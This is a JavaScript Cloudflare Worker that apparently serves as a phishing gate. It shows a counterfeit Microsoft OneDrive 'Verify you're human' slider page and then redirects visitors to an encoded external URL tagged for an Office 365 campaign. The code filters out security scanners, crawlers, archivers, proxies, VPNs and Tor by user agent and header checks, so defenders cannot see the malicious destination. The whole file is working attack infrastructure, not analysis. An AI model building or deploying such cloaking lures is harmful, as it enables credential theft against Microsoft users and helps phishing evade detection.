const DESTINATION_URL = "https://billionairesproperty.com/r/?c3Y9bzM2NV8xX29uZSZtPXRwJnVpZD1VU0VSMDkwNDIwMjVVMDEwNDA5MzcmdD1mTQ==N0123N";

// Enhanced bot detection
const BLOCK_UA = [
  /bot|crawler|spider|scraper|headless|phantom|selenium|webdriver|puppeteer|playwright/i,
  /curl|wget|python|java|perl|ruby|php|go|node|axios|request|fetch/i,
  /archive|index|monitor|scan|check|proxy|vpn|tor|anonymizer/i
];

// Use Cloudflare KV for persistence (you'll need to set this up)
// const sessionStorage = await env.SESSIONS.get();

// In-memory storage (resets on worker restart)
let sessionMap = new Map();
let rateLimitMap = new Map();

// Generate cryptographically secure token
function generateToken() {
  const array = new Uint8Array(32);
  crypto.getRandomValues(array);
  return Array.from(array, byte => byte.toString(16).padStart(2, '0')).join('');
}

// Rate limiting function
function checkRateLimit(ip) {
  const now = Date.now();
  const windowMs = 15 * 60 * 1000; // 15 minutes
  const maxAttempts = 10;
  
  if (!rateLimitMap.has(ip)) {
    rateLimitMap.set(ip, { count: 1, firstAttempt: now });
    return true;
  }
  
  const data = rateLimitMap.get(ip);
  
  // Reset if window has passed
  if (now - data.firstAttempt > windowMs) {
    rateLimitMap.set(ip, { count: 1, firstAttempt: now });
    return true;
  }
  
  // Check if exceeded limit
  if (data.count >= maxAttempts) {
    return false;
  }
  
  data.count++;
  return true;
}

// Advanced bot detection
function isLikelyBot(req) {
  const ua = req.headers.get("User-Agent") || "";
  const ip = req.headers.get("CF-Connecting-IP") || "unknown";
  
  // Check User-Agent patterns
  if (BLOCK_UA.some(r => r.test(ua)) || ua.length < 20) {
    return true;
  }
  
  // Check for common headers that bots miss
  const accept = req.headers.get("Accept");
  const acceptLang = req.headers.get("Accept-Language");
  const acceptEnc = req.headers.get("Accept-Encoding");
  
  if (!accept || !acceptLang || !acceptEnc) {
    return true;
  }
  
  return false;
}

// Clean up old sessions
function cleanupSessions() {
  const now = Date.now();
  for (const [token, data] of sessionMap.entries()) {
    if (now - data.created > 10 * 60 * 1000) { // 10 minutes
      sessionMap.delete(token);
    }
  }
  
  // Clean rate limits
  for (const [ip, data] of rateLimitMap.entries()) {
    if (now - data.firstAttempt > 15 * 60 * 1000) {
      rateLimitMap.delete(ip);
    }
  }
}

// Render the HTML with dynamic tokens
function renderHTML(verificationToken, sessionId) {
  return `<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Security Verification - OneDrive</title>
  <meta name="description" content="OneDrive security verification">
  <meta name="robots" content="noindex, nofollow">
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }
    
    body {
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      background: linear-gradient(135deg, #f3f2f1 0%, #e1dfdd 100%);
      min-height: 100vh;
      display: flex;
      align-items: center;
      justify-content: center;
      padding: 20px;
    }
    
    .container {
      background: white;
      border-radius: 8px;
      box-shadow: 0 4px 12px rgba(0,0,0,0.08);
      border: 1px solid #edebe9;
      padding: 40px;
      max-width: 400px;
      width: 100%;
      text-align: center;
    }
    
    .logo {
      margin-bottom: 24px;
    }
    
    .logo svg {
      width: 32px;
      height: 32px;
      fill: #0078d4;
    }
    
    h1 {
      color: #323130;
      font-size: 24px;
      font-weight: 600;
      margin-bottom: 8px;
      letter-spacing: -0.01em;
    }
    
    .subtitle {
      color: #605e5c;
      font-size: 14px;
      margin-bottom: 24px;
      line-height: 1.4;
    }
    
    .security-info {
      background: #f3f2f1;
      border-radius: 4px;
      padding: 12px 16px;
      margin-bottom: 32px;
      font-size: 13px;
      line-height: 1.4;
      color: #605e5c;
    }
    
    .slider-container {
      margin-bottom: 24px;
      position: relative;
      padding: 20px 0;
    }
    
    .slider-track {
      width: 100%;
      height: 12px;
      background: #e1dfdd;
      border-radius: 6px;
      position: relative;
      cursor: pointer;
      border: 1px solid #c8c6c4;
    }
    
    .slider-fill {
      height: 100%;
      background: #0078d4;
      border-radius: 6px;
      width: 0%;
      transition: width 0.2s ease;
      position: relative;
    }
    
    .slider-thumb {
      width: 32px;
      height: 32px;
      background: white;
      border-radius: 50%;
      position: absolute;
      top: 50%;
      left: 0%;
      transform: translate(-50%, -50%);
      cursor: grab;
      box-shadow: 0 2px 8px rgba(0,0,0,0.2);
      border: 3px solid #0078d4;
      z-index: 10;
      transition: transform 0.1s ease;
    }
    
    .slider-thumb:active {
      cursor: grabbing;
      transform: translate(-50%, -50%) scale(1.1);
    }
    
    .slider-text {
      margin-top: 20px;
      font-size: 15px;
      color: #605e5c;
      font-weight: 500;
    }
    
    .slider-text.verifying {
      color: #0078d4;
      font-weight: 600;
    }
    
    .error-message {
      color: #d13438;
      font-size: 14px;
      margin-top: 16px;
      display: none;
    }
    
    .footer {
      color: #605e5c;
      font-size: 12px;
      line-height: 1.4;
      margin-top: 24px;
    }
    
    .footer a {
      color: #0078d4;
      text-decoration: none;
    }
    
    .footer a:hover {
      text-decoration: underline;
    }
    
    .loading {
      display: none;
      margin-top: 16px;
    }
    
    .spinner {
      border: 2px solid #f3f2f1;
      border-top: 2px solid #0078d4;
      border-radius: 50%;
      width: 20px;
      height: 20px;
      animation: spin 1s linear infinite;
      margin: 0 auto;
    }
    
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <svg viewBox="0 0 24 24">
        <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"/>
      </svg>
    </div>
    
    <h1>Verify you're human</h1>
    <p class="subtitle">Slide the bar to the right to continue</p>
    
    <div class="security-info">This helps us protect your account from automated access</div>
    
    <div class="slider-container">
      <div class="slider-track" id="sliderTrack">
        <div class="slider-fill" id="sliderFill"></div>
        <div class="slider-thumb" id="sliderThumb"></div>
      </div>
      <div class="slider-text" id="sliderText">Slide to verify</div>
      <div class="error-message" id="errorMessage">Verification failed. Please try again.</div>
      <div class="loading" id="loading">
        <div class="spinner"></div>
        <div style="margin-top: 8px; font-size: 14px;">Verifying...</div>
      </div>
    </div>
    
    <div class="footer">
      Microsoft • 
      <a href="https://privacy.microsoft.com" target="_blank" rel="noopener">Privacy & cookies</a> • 
      <a href="https://www.microsoft.com/en-us/legal/intellectualproperty/copyright" target="_blank" rel="noopener">Terms of use</a>
    </div>
  </div>
  
  <script>
    const verificationToken = "${verificationToken}";
    const sessionId = "${sessionId}";
    
    let isDragging = false;
    let startX = 0;
    let startLeft = 0;
    let dragStartTime = 0;
    let verificationAttempted = false;
    
    const sliderTrack = document.getElementById('sliderTrack');
    const sliderFill = document.getElementById('sliderFill');
    const sliderThumb = document.getElementById('sliderThumb');
    const sliderText = document.getElementById('sliderText');
    const errorMessage = document.getElementById('errorMessage');
    const loading = document.getElementById('loading');
    
    // Mouse events
    sliderThumb.addEventListener('mousedown', startDrag);
    document.addEventListener('mousemove', drag);
    document.addEventListener('mouseup', stopDrag);
    
    // Touch events for mobile
    sliderThumb.addEventListener('touchstart', startDrag);
    document.addEventListener('touchmove', drag);
    document.addEventListener('touchend', stopDrag);
    
    function startDrag(e) {
      if (verificationAttempted) return;
      
      isDragging = true;
      dragStartTime = Date.now();
      const clientX = e.type === 'mousedown' ? e.clientX : e.touches[0].clientX;
      startX = clientX;
      startLeft = parseFloat(sliderThumb.style.left) || 0;
      e.preventDefault();
    }
    
    function drag(e) {
      if (!isDragging || verificationAttempted) return;
      
      const clientX = e.type === 'mousemove' ? e.clientX : e.touches[0].clientX;
      const deltaX = clientX - startX;
      const trackRect = sliderTrack.getBoundingClientRect();
      const percentage = ((startLeft + deltaX) / trackRect.width) * 100;
      
      updateSlider(percentage);
      e.preventDefault();
    }
    
    function stopDrag() {
      if (!isDragging || verificationAttempted) return;
      
      isDragging = false;
      const finalPercentage = parseFloat(sliderThumb.style.left) || 0;
      const dragDuration = Date.now() - dragStartTime;
      
      if (finalPercentage >= 95) {
        verifyCompletion(finalPercentage, dragDuration);
      }
    }
    
    function updateSlider(percentage) {
      percentage = Math.max(0, Math.min(100, percentage));
      
      sliderFill.style.width = percentage + '%';
      sliderThumb.style.left = percentage + '%';
      
      if (percentage < 10) {
        sliderText.textContent = 'Slide to verify';
        sliderText.classList.remove('verifying');
      } else if (percentage < 90) {
        sliderText.textContent = 'Keep sliding...';
        sliderText.classList.remove('verifying');
      } else if (percentage >= 90) {
        sliderText.textContent = 'Release to verify';
        sliderText.classList.add('verifying');
      }
    }
    
    async function verifyCompletion(finalPercentage, dragDuration) {
      if (verificationAttempted) return;
      verificationAttempted = true;
      
      sliderText.style.display = 'none';
      loading.style.display = 'block';
      
      try {
        const verificationData = {
          token: verificationToken,
          sessionId: sessionId,
          percentage: finalPercentage,
          duration: dragDuration,
          timestamp: Date.now(),
          userAgent: navigator.userAgent,
          language: navigator.language,
          platform: navigator.platform
        };
        
        const response = await fetch('/verify', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(verificationData)
        });
        
        const result = await response.json();
        
        if (result.success) {
          // Redirect to the verified URL
          window.location.href = result.redirectUrl;
        } else {
          throw new Error(result.error || 'Verification failed');
        }
        
      } catch (error) {
        console.error('Verification error:', error);
        loading.style.display = 'none';
        errorMessage.style.display = 'block';
        sliderText.style.display = 'block';
        sliderText.textContent = 'Verification failed';
        verificationAttempted = false;
        
        // Reset slider
        setTimeout(() => {
          sliderFill.style.width = '0%';
          sliderThumb.style.left = '0%';
          sliderText.textContent = 'Slide to verify';
          sliderText.classList.remove('verifying');
          errorMessage.style.display = 'none';
        }, 2000);
      }
    }
  </script>
</body>
</html>`;
}

// Handle verification requests
async function handleVerification(req, ip) {
  try {
    const data = await req.json();
    
    // Validate required fields
    if (!data.token || !data.sessionId || !data.percentage || !data.duration) {
      return new Response(JSON.stringify({ success: false, error: "Invalid request" }), {
        status: 400,
        headers: { "Content-Type": "application/json" }
      });
    }
    
    // Verify session exists
    const session = sessionMap.get(data.token);
    if (!session || session.sessionId !== data.sessionId) {
      return new Response(JSON.stringify({ success: false, error: "Invalid session" }), {
        status: 400,
        headers: { "Content-Type": "application/json" }
      });
    }
    
    // Check if already verified
    if (session.verified) {
      return new Response(JSON.stringify({ success: false, error: "Already verified" }), {
        status: 400,
        headers: { "Content-Type": "application/json" }
      });
    }
    
    // Increment attempts
    session.attempts++;
    
    // Server-side validation rules
    const minDragTime = 500; // Minimum 500ms drag time
    const maxDragTime = 30000; // Maximum 30 seconds
    const minPercentage = 95; // Minimum 95% completion
    
    if (data.percentage < minPercentage) {
      return new Response(JSON.stringify({ success: false, error: "Incomplete verification" }), {
        status: 400,
        headers: { "Content-Type": "application/json" }
      });
    }
    
    if (data.duration < minDragTime || data.duration > maxDragTime) {
      return new Response(JSON.stringify({ success: false, error: "Suspicious activity detected" }), {
        status: 400,
        headers: { "Content-Type": "application/json" }
      });
    }
    
    // Mark as verified
    session.verified = true;
    session.verifiedAt = Date.now();
    
    // Return success with redirect URL
    return new Response(JSON.stringify({ 
      success: true, 
      redirectUrl: DESTINATION_URL 
    }), {
      headers: { "Content-Type": "application/json" }
    });
    
  } catch (error) {
    return new Response(JSON.stringify({ success: false, error: "Verification failed" }), {
      status: 500,
      headers: { "Content-Type": "application/json" }
    });
  }
}

export default {
  async fetch(req, env, ctx) {
    try {
      const url = new URL(req.url);
      const ip = req.headers.get("CF-Connecting-IP") || "unknown";
      const userAgent = req.headers.get("User-Agent") || "";
      
      // Clean up old sessions periodically (10% chance)
      if (Math.random() < 0.1) {
        cleanupSessions();
      }
      
      // Handle verification endpoint
      if (url.pathname === '/verify' && req.method === 'POST') {
        return await handleVerification(req, ip);
      }
      
      // Serve the main page for all other routes
      
      // Check rate limiting
      if (!checkRateLimit(ip)) {
        return new Response(JSON.stringify({ 
          error: "Too many attempts. Please try again in 15 minutes." 
        }), {
          status: 429,
          headers: { 
            "Content-Type": "application/json",
            "Retry-After": "900"
          }
        });
      }
      
      // Enhanced bot detection
      if (isLikelyBot(req)) {
        return new Response("Access Denied", { 
          status: 403,
          headers: { "Content-Type": "text/plain" }
        });
      }
      
      // Generate verification session
      const verificationToken = generateToken();
      const sessionId = generateToken();
      const timestamp = Date.now();
      
      sessionMap.set(verificationToken, {
        sessionId,
        ip,
        created: timestamp,
        attempts: 0,
        verified: false
      });
      
      // Render the verification page
      return new Response(renderHTML(verificationToken, sessionId), {
        headers: { 
          "Content-Type": "text/html; charset=utf-8",
          "Cache-Control": "no-cache, no-store, must-revalidate",
          "X-Frame-Options": "DENY",
          "X-Content-Type-Options": "nosniff"
        }
      });
      
    } catch (error) {
      console.error('Error:', error);
      return new Response("Service temporarily unavailable", {
        status: 500,
        headers: { "Content-Type": "text/plain" }
      });
    }
  }
};